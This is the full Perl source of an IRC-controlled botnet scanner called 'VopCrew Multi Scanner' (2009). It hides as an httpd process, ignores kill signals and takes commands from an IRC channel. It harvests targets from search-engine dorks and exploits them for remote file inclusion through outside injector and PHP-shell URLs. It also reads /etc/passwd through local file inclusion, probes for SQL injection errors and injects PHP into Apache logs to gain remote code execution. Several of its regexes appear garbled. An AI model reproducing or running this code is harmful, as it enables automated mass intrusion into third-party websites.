#!/usr/bin/perl ############################################ # VopCrew Multi Scanner v5.0 Final Release # # Coded by Vrs-hCk # # d00r[at]telkom[dot]net # # Copyleft � 2009 VopCrew UnderGrounD # ############################################ # perl vopcrew.txt help me !!! # ############################################ # Dipersilahkan yang Ingin Menambah Engine # ############################################ use HTTP::Request; use LWP::UserAgent; use IO::Socket; use IO::Select; use Socket; my $fakeproc = "/usr/bin/httpd"; $ircserver = "irc.malangcyber.server.or.id"; my $ircport = "7000"; my $nickname = "mimim"; my $ident = "Arumbia"; my $channel = "#malangcyber"; my $runner = "yur4"; my $fullname = '15(7@2MC-Crew15)'; my $injector = "http://nic.bupt.edu.cn/media/idx"; my $phpshell = "http://warnetanggrek.com/gambar/sh.pdf"; my $rficmd = '!rfi'; my $lficmd = '!lfi'; my $sqlcmd = '!sql'; my $alicmd = '!ali'; $rfi_result = "v0pCr3w"; $lfi_test = "../../../../../../../../../../../../../../../etc/passwd%00"; $lfi_output = "root:(.+):(.+):(.+):(.+):(.+):(.+)"; $sql_test = "'"; $sql_output = ("sql syntax|sql error|right syntax to use near|syntax error converting|unclosed quotation"); my $success = "\n [+] VopCrew Multi Scanner\n [-] Loading Successfully ...\n [-] Process/PID : $fakeproc - $$\n"; my $failed = "\n [-] perl $0 \n\n"; #if (! $ARGV[1]){die ($failed);} #if (! $ARGV[2]){die ($failed);} #if (! $ARGV[3]){die ($failed);} #if (! $ARGV[4]){die ($failed);} #if (! $ARGV[5]){die ($failed);} #if (! $ARGV[6]){die ($failed);} #if (! $ARGV[7]){die ($failed);} #if (! $ARGV[8]){die ($failed);} print $success; $SIG{'INT'} = 'IGNORE'; $SIG{'HUP'} = 'IGNORE'; $SIG{'TERM'} = 'IGNORE'; $SIG{'CHLD'} = 'IGNORE'; $SIG{'PS'} = 'IGNORE'; chdir("/"); $ircserver="$ARGV[0]" if $ARGV[0]; $0 = "$fakeproc"."\0"x16;; my $pid = fork; exit if $pid; die "\n [!] Something Wrong !!!: $!" unless defined($pid); our %irc_servers; our %DCC; my $dcc_sel = new IO::Select->new(); $sel_client = IO::Select->new(); sub sendraw { if ($#_ == '1') { my $socket = $_[0]; print $socket "$_[1]\n"; } else { print $IRC_cur_socket "$_[0]\n"; } } sub connector { my $mynick = $_[0]; my $ircserver_con = $_[1]; my $ircport_con = $_[2]; my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1); if (defined($IRC_socket)) { $IRC_cur_socket = $IRC_socket; $IRC_socket->autoflush(1); $sel_client->add($IRC_socket); $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con"; $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con"; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost; nick("$mynick"); sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname"); sleep 1; } } sub parse { my $servarg = shift; if ($servarg =~ /^PING \:(.*)/) { sendraw("PONG :$1"); } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5; if ($args =~ /^\001VERSION\001$/) { notice("$pn", "\001VERSION mIRC v6.17 Khaled Mardam-Bey\001"); } if ($args =~ /^(\Q$mynick\E|\!a)\s+(.*)/ ) { my $natrix = $1; my $arg = $2; } } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { if (lc($1) eq lc($mynick)) { $mynick=$4; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; } } elsif ($servarg =~ m/^\:(.+?)\s+433/i) { nick("$mynick|".int rand(999)); } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { $mynick = $2; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'nome'} = "$1"; sendraw("MODE $nickname +Bx"); sendraw("JOIN $channel"); sendraw("PRIVMSG $channel :VopCrew UnderGround"); sendraw("PRIVMSG $runner :Hi $runner im here !!!"); } } my $line_temp; while( 1 ) { while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircport"); } delete($irc_servers{''}) if (defined($irc_servers{''})); my @ready = $sel_client->can_read(0); next unless(@ready); foreach $fh (@ready) { $IRC_cur_socket = $fh; $mynick = $irc_servers{$IRC_cur_socket}{'nick'}; $nread = sysread($fh, $msg, 4096); if ($nread == 0) { $sel_client->remove($fh); $fh->close; delete($irc_servers{$fh}); } @lines = split (/\n/, $msg); $msg =~ s/\r\n$//; ##################################################################### ############################[ CMD LIST ]############################# ##################################################################### if ($msg=~ /PRIVMSG $channel :!help/){ sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2Help15) 8,4 $rficmd | $lficmd | $sqlcmd "); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2Help15) 8,4 !id | !engine | !pid | !version | !about "); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2Help15) 8,4 Apache Log Injection : $alicmd "); } if ($msg=~ /PRIVMSG $channel :!id/){ &response(); } if ($msg=~ /PRIVMSG $channel :!version/){ sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2Version15)12 VopCrew Multi Scanner v5.0 Final Release"); } if ($msg=~ /PRIVMSG $channel :!engine/){ sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2Engine15)12 Google, MSN, AllTheWeb, Altavista, ASK, UOL, GigaBlast, LyCos."); } if ($msg=~ /PRIVMSG $channel :!pid/){ sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2PID15)12 Process/ID : 4 $fakeproc - $$"); } if ($msg=~ /PRIVMSG $channel :!about/){ sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2About15)3 VopCrew Multi Scanner v5.0 Final Release"); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2About15)3 Coded by Vrs-hCk - http://c0li.blogspot.com/"); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2About15)3 Copyleft � 2009 VopCrew UnderGrounD"); } ##################################################################### ###############################[ RFI ]############################### ##################################################################### ##################################################################### Google Engine if ($msg=~ /PRIVMSG $channel :$rficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "GooGLe"; my $bugx = $1; my $d0rk = $2; sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2RFI15)(7@2VopCrew15)12 Dork :4 $d0rk"); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2RFI15)(7@2VopCrew15)12 File :4 $bugx"); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2RFI15)(7@2VopCrew15)7 Search Engine Loading ..."); &rfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### AllTheWeb Engine if ($msg=~ /PRIVMSG $channel :$rficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "AllTheWeb"; my $bugx = $1; my $d0rk = $2; &rfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### MSN Engine if ($msg=~ /PRIVMSG $channel :$rficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "MsN"; my $bugx = $1; my $d0rk = $2; &rfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### Altavista Engine if ($msg=~ /PRIVMSG $channel :$rficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "ALtaViSTa"; my $bugx = $1; my $d0rk = $2; &rfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### ASK Engine if ($msg=~ /PRIVMSG $channel :$rficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "AsK"; my $bugx = $1; my $d0rk = $2; &rfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### UoL Engine if ($msg=~ /PRIVMSG $channel :$rficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "UoL"; my $bugx = $1; my $d0rk = $2; &rfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### GigaBlast Engine if ($msg=~ /PRIVMSG $channel :$rficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "GiGaBLaST"; my $bugx = $1; my $d0rk = $2; &rfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### LyCos Engine if ($msg=~ /PRIVMSG $channel :$rficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "LyCos"; my $bugx = $1; my $d0rk = $2; &rfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### ###############################[ LFI ]############################### ##################################################################### ##################################################################### Google Engine if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "GooGLe"; my $bugx = $1; my $d0rk = $2; sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2LFI15)(7@2VopCrew15)12 Dork :4 $d0rk"); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2LFI15)(7@2VopCrew15)12 File :4 $bugx"); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2LFI15)(7@2VopCrew15)7 Search Engine Loading ..."); &lfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### AllTheWeb Engine if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "AllTheWeb"; my $bugx = $1; my $d0rk = $2; &lfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### MSN Engine if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "MsN"; my $bugx = $1; my $d0rk = $2; &lfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### Altavista Engine if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "ALtaViSTa"; my $bugx = $1; my $d0rk = $2; &lfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### ASK Engine if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "AsK"; my $bugx = $1; my $d0rk = $2; &lfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### UoL Engine if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "UoL"; my $bugx = $1; my $d0rk = $2; &lfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### GigaBlast Engine if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "GiGaBLaST"; my $bugx = $1; my $d0rk = $2; &lfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### LyCos Engine if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "LyCos"; my $bugx = $1; my $d0rk = $2; &lfiscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### ###############################[ SQL ]############################### ##################################################################### ##################################################################### Google Engine if ($msg=~ /PRIVMSG $channel :$sqlcmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "GooGLe"; my $bugx = $1; my $d0rk = $2; sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2SQL15)(7@2VopCrew15)12 Dork :4 $d0rk"); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2SQL15)(7@2VopCrew15)12 File :4 $bugx"); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2SQL15)(7@2VopCrew15)7 Search Engine Loading ..."); &sqlscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### AllTheWeb Engine if ($msg=~ /PRIVMSG $channel :$sqlcmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "AllTheWeb"; my $bugx = $1; my $d0rk = $2; &sqlscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### MSN Engine if ($msg=~ /PRIVMSG $channel :$sqlcmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "MsN"; my $bugx = $1; my $d0rk = $2; &sqlscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### Altavista Engine if ($msg=~ /PRIVMSG $channel :$sqlcmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "ALtaViSTa"; my $bugx = $1; my $d0rk = $2; &sqlscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### ASK Engine if ($msg=~ /PRIVMSG $channel :$sqlcmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "AsK"; my $bugx = $1; my $d0rk = $2; &sqlscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### UoL Engine if ($msg=~ /PRIVMSG $channel :$sqlcmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "UoL"; my $bugx = $1; my $d0rk = $2; &sqlscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### GigaBlast Engine if ($msg=~ /PRIVMSG $channel :$sqlcmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "GiGaBLaST"; my $bugx = $1; my $d0rk = $2; &sqlscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### Lycos Engine if ($msg=~ /PRIVMSG $channel :$sqlcmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "LyCos"; my $bugx = $1; my $d0rk = $2; &sqlscan($engx,$bugx,$d0rk); } exit; } } ##################################################################### ##################################################################### Apache Log Injection if ($msg=~ /PRIVMSG $channel :$alicmd\s+(.*?)\s+(.+[0-9])/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &injectlog($1,$2); } exit; } } for(my $c=0; $c<= $#lines; $c++) { $line = $lines[$c]; $line=$line_temp.$line if ($line_temp); $line_temp=''; $line =~ s/\r$//; unless ($c == $#lines) { parse("$line"); } else { if ($#lines == 0) { parse("$line"); } elsif ($lines[$c] =~ /\r$/) { parse("$line"); } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { parse("$line"); } else { $line_temp = $line; } } } } } ##################################################################### Procedure sub injectlog() { my $host = $_[0]; my $port = $_[1]; sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2ALI15)12 Injecting7 ".$host.":".$port." 12Apache Access Log ..."); my $php = ""; $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => 80, Proto => "tcp") || die sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2ALI15)4 Cant Connect to7 ".$host.":".$port.""); print $sock "GET /vOpCrEw.UnderGrounD ".$php." HTTP/1.1\r\n"; print $sock "Host: ".$host."\r\n"; print $sock "Connection: close\r\n\r\n"; close($sock); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2ALI15)7 ".$host." 12is Done ..."); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2ALI15)7 ".$host." 12RCE Parameter ->3 c0li"); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2ALI15)7 ".$host." 12RCE Identifier ->3 vOpCrEw.UnderGrounD"); } sub rfiscan() { my $engz = $_[0]; my $bugz = $_[1]; my $dork = $_[2]; my $contatore = 0; if ($engz =~ /GooGLe/) { my @google=&google($dork); push(@total, @google); } if ($engz =~ /AllTheWeb/) { my @alltheweb=&alltheweb($dork); push(@total, @alltheweb); } if ($engz =~ /MsN/) { my @msn=&msn($dork); push(@total, @msn); } if ($engz =~ /ALtaViSTa/) { my @altavista=&altavista($dork); push(@total, @altavista); } if ($engz =~ /AsK/) { my @ask=&ask($dork); push(@total, @ask); } if ($engz =~ /UoL/) { my @uol=&uol($dork); push(@total, @uol); } if ($engz =~ /GiGaBLaST/) { my @gigablast=&gigablast($dork); push(@total, @gigablast); } if ($engz =~ /LyCos/) { my @lycos=&lycos($dork); push(@total, @lycos); } my @clean=&calculate(@total); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2RFI15)(7@2$engz15)12 Total:4 (".scalar(@total).")12 Clean:4 (".scalar(@clean).")"); if (scalar(@clean) != 0) { sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2RFI15)(7@2$engz15)7 Exploiting4 $dork"); } my $uni=scalar(@clean); foreach my $target (@clean) { $contatore++; if ($contatore==$uni-1){ sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2RFI15)(7@2$engz15)10 Scan Finish for14 $dork"); } my $xpl = "http://".$target.$bug.$injector."?"; my $vuln = "http://".$target."12".$bugz."7".$phpshell."?"; my $re = getcontent($xpl); if($re =~ /$rfi_result/ && $re =~ /uid=/){ os($xpl); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2RFI15)(7@2$engz15)15(13@12Vulnerable15)4 ".$vuln." 15(7@6".$os."15)(7@3SAFEMODE-OFF15)"); } elsif($re =~ /$rfi_result/) { os($xpl); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2RFI15)(7@2$engz15)15(13@12Vulnerable15)4 ".$vuln." 15(7@6".$os."15)(7@4SAFEMODE-ON15)"); } } } sub lfiscan() { my $engz = $_[0]; my $bugz = $_[1]; my $dork = $_[2]; my $contatore = 0; if ($engz =~ /GooGLe/) { my @google=&google($dork); push(@total, @google); } if ($engz =~ /AllTheWeb/) { my @alltheweb=&alltheweb($dork); push(@total, @alltheweb); } if ($engz =~ /MsN/) { my @msn=&msn($dork); push(@total, @msn); } if ($engz =~ /ALtaViSTa/) { my @altavista=&altavista($dork); push(@total, @altavista); } if ($engz =~ /AsK/) { my @ask=&ask($dork); push(@total, @ask); } if ($engz =~ /UoL/) { my @uol=&uol($dork); push(@total, @uol); } if ($engz =~ /GiGaBLaST/) { my @gigablast=&gigablast($dork); push(@total, @gigablast); } if ($engz =~ /LyCos/) { my @lycos=&lycos($dork); push(@total, @lycos); } my @clean = &calculate(@total); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2LFI15)(7@2$engz15)12 Total:4 (".scalar(@total).")12 Clean:4 (".scalar(@clean).")"); if (scalar(@clean) != 0) { sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2LFI15)(7@2$engz15)7 Exploiting4 $dork"); } my $uni=scalar(@clean); foreach my $target (@clean) { $contatore++; if ($contatore==$uni-1){ sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2LFI15)(7@2$engz15)10 Scan Finish for14 $dork"); } my $xpl = "http://".$target.$bugz.$lfi_test; my $vuln = "http://".$target."12".$bugz."7".$lfi_test.""; my $re = getcontent($xpl); if ($re =~ /$lfi_output/){ sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2LFI15)(7@2$engz15)15(13@12Vulnerable15)4 ".$vuln." 15(7@3VopCrew15)"); } } } sub sqlscan() { my $engz = $_[0]; my $bugz = $_[1]; my $dork = $_[2]; my $contatore = 0; if ($engz =~ /GooGLe/) { my @google=&google($dork); push(@total, @google); } if ($engz =~ /AllTheWeb/) { my @alltheweb=&alltheweb($dork); push(@total, @alltheweb); } if ($engz =~ /MsN/) { my @msn=&msn($dork); push(@total, @msn); } if ($engz =~ /ALtaViSTa/) { my @altavista=&altavista($dork); push(@total, @altavista); } if ($engz =~ /AsK/) { my @ask=&ask($dork); push(@total, @ask); } if ($engz =~ /UoL/) { my @uol=&uol($dork); push(@total, @uol); } if ($engz =~ /GiGaBLaST/) { my @gigablast=&gigablast($dork); push(@total, @gigablast); } if ($engz =~ /LyCos/) { my @lycos=&lycos($dork); push(@total, @lycos); } my @clean = &calculate(@total); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2SQL15)(7@2$engz15)12 Total:4 (".scalar(@total).")12 Clean:4 (".scalar(@clean).")"); if (scalar(@clean) != 0) { sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2SQL15)(7@2$engz15)7 Exploiting4 $dork"); } my $uni = scalar(@clean); foreach my $target (@clean) { $contatore++; if ($contatore==$uni-1){ sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2SQL15)(7@2$engz15)10 Scan Finish for14 $dork"); } my $xpl = "http://".$target.$bugz.$sql_test; my $vuln = "http://".$target."12".$bugz."7[SQL]"; my $re = getcontent($xpl); if ($re =~ /$sql_output/){ sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2SQL15)(7@2$engz15)15(13@12ErrorQuery15)4 ".$vuln." 15(7@3VopCrew15)"); } } } sub os() { my $site = $_[0]; my $re = &query($site); while ($re =~ m/
os:(.+?)\
/g) { $os = $1; if ($1 =~ //) { $os = "Unkn0wN"; } } } sub response() { my $re = getcontent($injector); if ($re =~ /pZLNd8MwEITvg/) { sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2RFI15)12 � 3OK12 �"); } else { sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2RFI15)12 � 4JAH12 �"); } } sub getcontent() { $url = $_[0]; my $req = HTTP::Request->new(GET => $url); my $ua = LWP::UserAgent->new(); $ua->timeout(5); my $response = $ua->request($req); return $response->content; } sub google(){ my @lst; my $key = $_[0]; for ($b=0;$b<=1000;$b+=100){ my $Go=("http://www.google.com/search?q=".key($key)."&num=100&filter=0&start=".$b); my $Res=query($Go); while ($Res =~ m/\"]*)\//g){ if ($1 !~ /google/){ my $k=$1; my @grep=links($k); push(@lst,@grep); } } } return @lst; } sub alltheweb() { my @lst; my $key = $_[0]; my $i = 0; my $pg = 0; for ( $i = 0 ; $i <= 1000 ; $i += 100 ) { my $all = ("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i); my $Res = query($all); while ( $Res =~ m/http:\/\/(.+?)\<\/span>/g ) { my $k = $1; $k =~ s/ //g; my @grep = links($k); push( @lst, @grep ); } } return @lst; } sub uol() { my @lst; my $key = $_[0]; for ( $b = 1 ; $b <= 1000 ; $b += 10 ) { my $UoL = ("http://mundo.busca.uol.com.br/buscar.html?q=".key($key)."&start=".$i); my $Res = query($UoL); while ( $Res =~ m/\"]*)/g ) { my $k = $1; if ( $k !~ /busca|uol|yahoo/ ) { my $k = $1; my @grep = links($k); push( @lst, @grep ); } } } return @lst; } sub msn() { my @lst; my $key = $_[0]; for ( $b = 1 ; $b <= 1000 ; $b += 10 ) { my $MsN = ("http://search.live.com/results.aspx?q=".key($key)."&first=".$b."&FORM=PERE"); my $Res = query($MsN); while ( $Res =~ m/\"]*)\//g ) { if ( $1 !~ /msn|live/ ) { my $k = $1; my @grep = links($k); push( @lst, @grep ); } } } return @lst; } sub altavista(){ my @lst; my $key = $_[0]; for ($b=1;$b<=1000;$b+=10){ my $AlT=("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b); my $Res=query($AlT); while ($Res=~m/(.+?)\//g){ if ($1 !~ /altavista/){ my $k=$1; $k=~s//g) { if ($1 !~ /lycos/){ my $k = $1; my @grep = links($k); push(@lst, @grep); } } } return @lst; } sub links() { my @l; my $link = $_[0]; my $host = $_[0]; my $hdir = $_[0]; $hdir =~ s/(.*)\/[^\/]*$/\1/; $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; $host .= "/"; $link .= "/"; $hdir .= "/"; $host =~ s/\/\//\//g; $hdir =~ s/\/\//\//g; $link =~ s/\/\//\//g; push( @l, $link, $host, $hdir ); return @l; } sub key() { my $dork = $_[0]; $dork =~ s/ /\+/g; $dork =~ s/:/\%3A/g; $dork =~ s/\//\%2F/g; $dork =~ s/&/\%26/g; $dork =~ s/\"/\%22/g; $dork =~ s/,/\%2C/g; $dork =~ s/\\/\%5C/g; return $dork; } sub query($) { my $url = $_[0]; $url =~ s/http:\/\///; my $host = $url; my $query = $url; my $page = ""; $host =~ s/href=\"?http:\/\///; $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; $query =~ s/$host//; if ( $query eq "" ) { $query = "/"; } eval { my $sock = IO::Socket::INET->new(PeerAddr => "$host", PeerPort => "80", Proto => "tcp") or return; print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; my @r = <$sock>; $page = "@r"; close($sock); }; return $page; } sub calculate { my @calculate = (); my %visti = (); foreach my $element (@_) { $element =~ s/\/+/\//g; next if $visti{$element}++; push @calculate, $element; } return @calculate; } sub nick { return unless $#_ == 0; sendraw("NICK $_[0]"); } sub notice { return unless $#_ == 1; sendraw("NOTICE $_[0] :$_[1]"); }